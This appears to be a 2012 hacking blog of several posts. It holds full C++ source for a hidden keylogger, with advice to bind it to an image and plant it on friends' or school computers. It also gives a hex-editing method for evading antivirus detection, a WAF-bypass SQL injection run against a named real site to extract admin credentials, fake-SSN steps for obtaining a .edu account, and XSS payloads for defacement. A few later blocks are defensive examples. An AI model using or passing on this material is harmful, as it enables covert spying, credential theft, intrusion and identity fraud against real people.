
Wednesday, July 25, 2012

How to create Keylogger using Visual C++?

Hi friends, the most interesting part of hacking is spying. Today I am going to introduce the C++ spyware code. It is going to be very fun. You can install this spyware on your college/school system or on your friend's system and get their usernames and passwords. This is a very simple hacking trick compared to a phishing web page.



Disadvantages of a phishing web page:
  • You have to upload the phishing web page to a web host, and only a few hosts won't detect the phishing page.
  • The website URL is different, so it is easy to detect that we are hacking.

Advantages of a spyware keylogger:
  • Very simple and easy method.
  • The victim can't detect that we are hacking.

How to create Keylogger using Visual C++?
Requirements:
  • Dev C++. Download it from here: http://www.bloodshed.net/
  • Knowledge of C++ (needed if you are going to develop the code yourself).

Install Dev C++ on your system and open the Dev C++ compiler.
Go to File->New->Source File.
You will see a blank workspace in the window.
Now copy the keylogger code below into the blank workspace.

#include <iostream>
#include <cstdio>      // FILE, fopen, fprintf, fclose (was missing)
#include <windows.h>
#include <winuser.h>
using namespace std;

int Save(int key_stroke, const char *file);
void Stealth();

int main()
{
    Stealth();          // hide the console window first
    int i;              // int, not char: a signed char can never reach 190, so the loop bound was never met

    while (1)
    {
        // Poll every virtual-key code from VK_BACK (8) to VK_OEM_PERIOD (190).
        // GetAsyncKeyState sets the high bit while the key is down and the low bit
        // if it was pressed since the last call; -32767 is 0x8001, i.e. both set.
        for (i = 8; i <= 190; i++)
        {
            if (GetAsyncKeyState(i) == -32767)
                Save(i, "LOG.txt");
        }
    }
    system("PAUSE");
    return 0;
}

/* *********************************** */

// Append one keystroke to the log file, writing labels for the special keys.
int Save(int key_stroke, const char *file)
{
    if ((key_stroke == 1) || (key_stroke == 2))   // VK_LBUTTON / VK_RBUTTON: ignore mouse buttons
        return 0;

    FILE *OUTPUT_FILE = fopen(file, "a+");
    if (OUTPUT_FILE == NULL)                      // could not open the log: skip this key
        return 1;

    cout << key_stroke << endl;                   // echo the key code to the (hidden) console

    if (key_stroke == 8)
        fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
    else if (key_stroke == 13)
        fprintf(OUTPUT_FILE, "%s", "\n");
    else if (key_stroke == 32)
        fprintf(OUTPUT_FILE, "%s", " ");
    else if (key_stroke == VK_TAB)
        fprintf(OUTPUT_FILE, "%s", "[TAB]");
    else if (key_stroke == VK_SHIFT)
        fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
    else if (key_stroke == VK_CONTROL)
        fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
    else if (key_stroke == VK_ESCAPE)
        fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
    else if (key_stroke == VK_END)
        fprintf(OUTPUT_FILE, "%s", "[END]");
    else if (key_stroke == VK_HOME)
        fprintf(OUTPUT_FILE, "%s", "[HOME]");
    else if (key_stroke == VK_LEFT)
        fprintf(OUTPUT_FILE, "%s", "[LEFT]");
    else if (key_stroke == VK_UP)
        fprintf(OUTPUT_FILE, "%s", "[UP]");
    else if (key_stroke == VK_RIGHT)
        fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
    else if (key_stroke == VK_DOWN)
        fprintf(OUTPUT_FILE, "%s", "[DOWN]");
    else if (key_stroke == 190 || key_stroke == 110)   // VK_OEM_PERIOD, VK_DECIMAL
        fprintf(OUTPUT_FILE, "%s", ".");
    else
        fprintf(OUTPUT_FILE, "%c", key_stroke);   // was "%s" with &key_stroke, which relied on the int's byte layout

    fclose(OUTPUT_FILE);
    return 0;
}

/* *********************************** */

// Dev C++ builds a console program; allocate the console and hide its window at once.
void Stealth()
{
    HWND Stealth;
    AllocConsole();
    Stealth = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(Stealth, 0);   // 0 == SW_HIDE
}

Compile the code (Ctrl+F9).

Now execute the program by selecting Execute->Run (Ctrl+F10).

Now your keylogger will run on your system. Whatever you type on the keyboard will be stored in the LOG.txt file.
You can see the LOG.txt file where you saved the file.

Bind the exe file with an image or any other file and send it to your friend,
(or)
if you have physical access to your college/school system, copy the exe file to that system and run it.

For now, I have just given a simple keylogger. Soon I will post a more efficient keylogger's program code.

html button in Facebook walls

You can share an HTML button on walls as a status. Can you believe it? This hacking trick was found by Acizninja DeadcOde.


  • Login to your Facebook account.
  • Copy the following code and paste it in the address bar:

https://www.facebook.com/dialog/feed?app_id=209403259107231&redirect_uri=https%3A%2F%2Fwww..facebook.com&message&link=http%3A%2F%2Fwww.BreakTheSecurity.com%2F&name=<center><button>Visit+:+BreakTheSecurity<%2Fbutton><%2Fcenter>
Press the share button now. Now visit your profile page and you can see the button. You can also share it with your friends.

You can change www.BreakTheSecurity.com to your address.
BreakTheSec is the button display name.
Don't change 20940325910723. This is the application ID.

These are some urls with modified code:
a. http://goo.gl/6yZPr
b. http://tinyurl.com/3thplca
c. http://goo.gl/3NgWY (with music)

Credits: Acizninja DeadcOde

Tuesday, July 24, 2012

1337 (leet) language for hackers who are using facebook

Hi Mates !
If you love 1337 then it's good news for you: Facebook has officially launched the H4X0R's language (Hackers' 1337, leet speak).

How to apply 1337 on your Facebook?
1- Login to your Facebook account
2- Go to account settings
3- Search for the language option
4- Now set it to "1337 speak"
You're done!
If you want to use Facebook in your old language, set it to English (US) again.

enjoy :)

Hex Editing to make Trojans & viruses Undetectable-Basic Guide

You may not be familiar with what hex editing is, and you may also not be familiar with how this technique can be used to hide a viral program or a Trojan. Many of you may know other ways of hiding viruses too, like using public cryptors, which will also be posted here soon. Many of you also asked how to hide a Trojan or your created server in keyloggers so that the victim's antivirus does not identify the virus and he does not get warned. So I will tell my readers how the hackers make this possible and how you can be fooled by hackers too, as they may fool your antivirus. It is necessary that you have this knowledge from a security point of view.

What is Hex editing?

Hex editing is a method of hiding programs containing viruses and Trojans from a specific antivirus. I used the word "specific" because it is actually up to you which antivirus you hex edit it against, so that this particular antivirus does not catch the virus. If the Trojan is popular and the viral code is old, then it is certain that the latest updates of all antiviruses contain the information about that Trojan and virus. So here comes the hard work, which is entirely yours. In hex editing, those parts of the code in the program which cause the virus detection are removed, or altered to some other code which is not present in the antivirus definitions as viral code. Using this scheme we can bypass the antivirus in question.

How to do Hex Editing?

Now, in order to find the particular piece of code that is present in the antivirus definitions as viral code, we have to split our Trojan into many parts, and then separate out those parts which, when scanned, again raise a virus alert in the antivirus. We split those parts again, and this is repeated until we find the exact part. After that we need a hex editor to edit the specific code, e.g. if xx is present in the antivirus definitions as viral code we change it to xy so that the antivirus does not detect it. After this we combine all the pieces back into a single executable file. So what are we going to need?
  • An unpacked trojan server (your virus)
  • File Splitter (Download File Splitter here)
  • Hex Editor (Download Open Source Hex Editor here)
Using the splitter, distribute the infected program into small parts and then scan every part. When a part is detected as a virus, split that part again into a new folder and scan every part, and keep doing this until you get the smallest part which contains the piece of viral code recognised by the antivirus. Edit that piece or pieces in the hex editor and change the value of the first line to 0, like I did, and then rescan that part. If you get the virus alert again, do the same with the next line, save it and scan again; hopefully after that the alert won't occur. Now rebuild those parts with the "File splitter builder exe" given in every folder where you split a file, and carry on like this, merging parts with the file splitter's exe for every part you distributed, in the same folder where you split it. Then scan your Trojan at the end and hope it is not detectable. I'll explain all this in detail someday. That's enough for today.

ByPassing Web Application Firewall in SQL injection

Hi all!
Today I am going to present a tutorial on bypassing a Web Application Firewall in SQL injection.
OK, let's start. I am taking a website as an example which is WAF protected.
Come to the point! Our test website is
First of all we will find out the total number of columns.
The total number of columns is 14 (find out the columns using the ORDER BY command).
Now we are going to use the UNION SELECT command to find out through which column our data will be displayed on the screen:
 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14--
But the WAF will block it and a 403 page will be displayed.
OK, how to bypass it?
Use the union and select keywords inside inline comments (/*!union*/ /*!select*/) and the URL will be like this:
 http://majestic-beauty.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
Firewall bypassed :D
OK.
The screen is showing the numbers 2, 3 and 9, so we can take any of these, and I am going to extract data via column 2.
We are going to extract the table names.
The URL will be like this one:
 http://majestic-beauty.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!table_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.tables+where+/*!table_schema*/+like+database()+limit 0,1--
We are using the LIMIT clause because group_concat is not working, so we extract the table names one by one. limit 0,1 gives us the first table name from the database; to extract the next table name, increase limit 0,1 to limit 1,1, like this:
 http://majestic-beauty.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!table_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.tables+where+/*!table_schema*/+like+database()+limit 1,1--
And the page will show the next table name.
We got the admin table, which is "admin".
It's time to get the names of the columns of table "admin".
The URL will be like this:
 http://majestic-beauty.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!column_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.columns+where+/*!table_name*/=char(97,100,109,105,110) limit 0,1--
Again we need to use the LIMIT clause (same reason, group_concat not working).
By executing this URL we get the column named username.
When I increased the value of limit from limit 0,1 to limit 1,1, the second column name, which is Password, showed on screen:
http://majestic-beauty.com/large.php?CleanUrl=&mID=297&sID=313&PID=-2109+/*!union*/+/*!select*/+1,/*!column_name*/,3,4,5,6,7,8,9,10,11,12,13,14+from+/*!information_schema*/.columns+where+/*!table_name*/=char(97,100,109,105,110) limit 0,1--
We are done with the columns too: the table name is admin and the columns are Username and Password. Let's move to the final step. Now we are going to extract the username and password from the username and password columns. When group_concat is not working, it's better to extract data from one column at a time.
I am going to extract the password, and the URL will be like this:
And this tutorial is over :D
Thank you!
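As an added defender's example (not part of the tutorial), here is why a keyword-matching WAF misses the /*!union*/ /*!select*/ form and how normalising the parameter the way MySQL parses it closes that gap. The SAMPLES values are constructed from the URLs above; the real fix for the application is parameterised queries, not a better blocklist.

```python
import re

# Constructed from the two query values in the tutorial: the plain UNION SELECT the
# WAF blocked with a 403, and the /*!...*/ version-comment form that got through.
SAMPLES = {
    "plain":  "-2109+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--",
    "inline": "-2109+/*!union*/+/*!select*/+1,/*!table_name*/,3+from+/*!information_schema*/.tables--",
}

# The kind of keyword signature a blocklist WAF applies to the raw parameter.
KEYWORD_RULE = re.compile(r"\bunion\s+select\b", re.IGNORECASE)


def naive_waf_blocks(value: str) -> bool:
    """Match the rule against the raw value, as the bypassed WAF evidently did."""
    return KEYWORD_RULE.search(value.replace("+", " ")) is not None


def normalize(value: str) -> str:
    """Rewrite the value the way MySQL will read it, then match rules on that.
    MySQL executes the body of /*! ... */ version comments, so their body is kept;
    ordinary /* ... */ comments are whitespace to the server and are dropped;
    '+' and %20 are URL-encoded spaces; whitespace runs are collapsed so
    'union   select' and 'union/**/select' look identical to the rule."""
    value = value.replace("+", " ").replace("%20", " ")
    value = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", value, flags=re.DOTALL)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.DOTALL)
    return re.sub(r"\s+", " ", value).strip()


def normalized_waf_blocks(value: str) -> bool:
    """Same rule, applied after normalisation: catches both samples."""
    return KEYWORD_RULE.search(normalize(value)) is not None


if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:6} naive={naive_waf_blocks(value)} "
              f"normalized={normalized_waf_blocks(value)}")
```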

Sunday, July 22, 2012

How to get a .edu e-mail address




1) Go to https://eims.maricopa.edu/MAW/MAW.html and check "I am a new student and have never attended any Maricopa Community College or Skill Centers." Then type in the verification code.

2) Open a new window/tab and go to http://www.fakenamegenerator.com/ and find the SSN. Remove any hashes so it's only numeric. Enter a fake date of birth, first name, and last name.


3) Finish registration by using a fake phone number, zip code, city, etc. Use your real e-mail address. Type in a password and click Next.

4) Enter the 2 security questions as you wish.

5) You're done! Remember to write down and save the MEID as you'll need it to log in. The password is the password you entered.

6) Wait for about 20 minutes and then go to http://mail.google.com/a/maricopa.edu to login. That'll be your login link whenever you want to use your ID.

Saturday, July 21, 2012

Full Website Hacking Simulator (DVWA)

Damn Vulnerable Web Application (DVWA) is a deliberately vulnerable web application, based on PHP / MySQL, for practising website hacking. DVWA is an option for beginners to learn web hacking techniques from scratch; various web hacking attack techniques can be learned with this tool. Besides being easy to use, lightweight and complete, DVWA runs on a local server (localhost) using WAMP / XAMPP / LAMP and others.
DVWA includes modules for web hacking techniques such as:
- SQL Injection
- XSS (Cross Site Scripting)
- LFI (Local File Inclusion)
- RFI (Remote File Inclusion)
- Command Execution
- Upload Script
- Login Brute Force

Download here

XSS (Cross Site Scripting)

This is a very common vulnerability called XSS (Cross Site Scripting), plus how to exploit it.

What is XSS, what can I accomplish with it?
XSS is common in search bars and comment boxes. We can then inject almost any kind of markup or script into the website, whether JavaScript, HTML or XML. XSS is mainly directed at JavaScript injection; however, you can inject other languages, which will be shown later.
Most people use it to display messages on the website, redirect you to their defacement, and even put cookie loggers and XSS shells on the website.

What causes the vulnerability?
Poor PHP coding behind text boxes and submission forms. The developers were too lazy to code it properly, allowing us to inject strings into the page's source code; since our input is then part of the source code, the browser renders whatever we put in. They did not bother to filter what we type in and allowed characters such as >, ", /, etc.

What types of XSS are there?
There are two types of XSS: persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page, come back, and it's still there), then it is persistent. That is good. With non-persistent XSS it will not stick on the website; you will only see it once. With persistent XSS you can do much more: leave messages, redirect users, etc. With non-persistent XSS the most you can do is upload a cookie logger.

What will you be teaching today?
The basics of XSS and cookie logging.

How to test for XSS vulnerabilities.
To test if the website is vulnerable to XSS we want to go to a search box and inject some JavaScript. We've found a search box, and now we want to use JavaScript to alert a message so we can see if the JavaScript was successfully executed:

<script>alert('XSS');</script>

We now see a pop-up message on our screen saying "XSS". This is what it should look like: http://img845.imageshack.us/img845/7924/xss1.png

In some cases, a message might not pop up. If it doesn't work, check the source code and have a look at the output. Most of the time fixing it only requires a little change, such as closing the attribute or tag your input landed in:

"><script>alert('XSS');</script>

Okay, we have found out that it is vulnerable. We can now move on.
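As an added example (not code from the post), a small Python model of the two reflection contexts the post describes: the term echoed into page text, where the first payload runs, and the term echoed into the search box's value attribute, where it stays inert until the "> prefix closes the attribute. It also shows that escaping the term with html.escape(quote=True) neutralises both payloads in both contexts; the templates and the attribute-stripping check are constructed for this demonstration.

```python
import html
import re

# Constructed payloads: the post's first test and its '">' variant.
PAYLOAD_PLAIN = "<script>alert('XSS');</script>"
PAYLOAD_BREAKOUT = '"><script>alert(\'XSS\');</script>'


def reflect_in_text(term: str, escape: bool = False) -> str:
    """Search page that echoes the term into body text (the post's first case)."""
    shown = html.escape(term, quote=True) if escape else term
    return f"<p>Results for: {shown}</p>"


def reflect_in_attribute(term: str, escape: bool = False) -> str:
    """Search page that echoes the term back into the search box's value attribute
    (the case where the first payload does not pop up)."""
    shown = html.escape(term, quote=True) if escape else term
    return f'<input type="text" name="q" value="{shown}">'


# Deliberately small check for these two templates, not a general HTML parser:
# blank out every double-quoted attribute value and see what markup is left.
ATTR_VALUE = re.compile(r'="[^"]*"')


def script_tag_reachable(page: str) -> bool:
    """True when a <script> start tag sits in markup the browser will parse as a tag,
    i.e. outside every double-quoted attribute value. Text inside value="..." is
    just a string to the browser, so a payload there never runs."""
    markup_only = ATTR_VALUE.sub('=""', page)
    return "<script" in markup_only.lower()


def demo() -> dict:
    """Map each (context, payload, escaped) combination to whether the script runs."""
    results = {}
    for ctx_name, render in (("text", reflect_in_text), ("attribute", reflect_in_attribute)):
        for pl_name, payload in (("plain", PAYLOAD_PLAIN), ("breakout", PAYLOAD_BREAKOUT)):
            for escape in (False, True):
                results[(ctx_name, pl_name, escape)] = script_tag_reachable(render(payload, escape))
    return results


if __name__ == "__main__":
    for key, fired in demo().items():
        print(key, "script runs" if fired else "inert")
```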

How can I deface a webpage with XSS?
I will be showing you methods for persistent and non-persistent XSS.

Persistent XSS.
First I will be starting with persistent XSS. Since it's persistent, I want to redirect my victims to a deface page. We simply inject some more JavaScript, like we did before:

<script>window.location="http://yourdefacepage.com/index.html";</script>

Remember, you can always alter the code if it doesn't work.
You can do many things with XSS; you just need the right strings. I'm only focusing on defacing, since most people just deface sites these days.

Non-persistent XSS.
Okay. Obviously we can't redirect users with non-persistent XSS. But with basic web programming knowledge we can make a cookie logger. We may also need advanced social engineering skills to get people to open our cookie logger.

How to make a cookie logger. (Cookie Logger's Tutorial Coming Soon ...)